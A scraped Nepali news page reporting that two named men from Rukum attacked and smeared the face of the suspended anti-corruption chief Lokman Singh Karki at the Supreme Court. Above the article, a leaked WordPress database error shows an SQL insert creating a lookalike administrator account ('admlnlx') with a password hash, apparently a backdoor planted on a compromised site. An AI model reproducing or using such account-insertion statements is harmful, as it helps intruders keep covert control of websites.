WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrrgQPNy6HUMw/R7e3uMap3y6hez7h.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 09:36:02', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ७-
अख्तियार दुरुपयोग अनुसन्धान आयोगका निलम्बित प्रमुख लोकमानसिंह कार्कीलाई आज सर्वोच्च अदालत परिसरमै आक्रमण गरी कालोमोसो दल्ने दुई जनाको परिचय खुलेको छ। प्रहरी स्रोतका अनुसार पक्राउ पर्ने दुई जनामा प्रवल शाही र चन्द्रबहादुर बूढा रहेका छन्। दुवैको स्थायी ठेगाना रुकुम रहेको खुलेको छ।
उनीहरुले किन आक्रमण गरेका हुन् भन्ने बारे अनुसन्धान भइरहेको छ। आक्रमण लगत्तै उनीहरुले नेकपा माओवादी जिन्दावाद र हत्यारालाई कारबाही गर नारा लगाएका थिए।